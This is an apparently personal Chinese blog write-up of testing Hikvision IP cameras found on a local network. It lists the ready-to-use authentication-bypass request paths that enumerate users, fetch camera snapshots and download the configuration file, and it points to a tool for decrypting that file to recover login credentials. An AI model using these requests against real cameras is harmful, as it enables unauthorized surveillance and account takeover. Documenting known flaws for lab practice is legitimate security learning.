0x00 前言
考试周太Boring了
本来局域网搭个靶场打打
然后扫到了几个摄像头,比较简单,就试试看
本文基本参考freebuf文章编写!!!
贴上参考师傅文章
https://www.freebuf.com/vuls/278336.html
0x01 开日
漏洞探测
探测用户列表
/Security/users?auth=YWRtaW46MTEK
读取快照
onvif-http/snapshot?auth=YWRtaW46MTEK
下载摄像头配置文件
/System/configurationFile?auth=YWRtaW46MTEK
配置文件的解密
hikvision的配置文件是加密的。解密工具网上很多要么收费的,要么不靠谱的
git上有好用的
https://github.com/WormChickenWizard/hikvision-decrypter
读取解密后的配置文件
需要用到wxmedit
下载地址:
https://wxmedit.github.io/zh_CN/downloads.html
根据你一开始读到的用户进行查找
done
记得登陆后用IE看!
再强调一下 本文参照freebuf上师傅的文章编写!!!
只是拿师傅的方法实操了一下
https://www.freebuf.com/vuls/278336.html
0x02 rethink
伪RT的快乐日常?
脚本小子罢了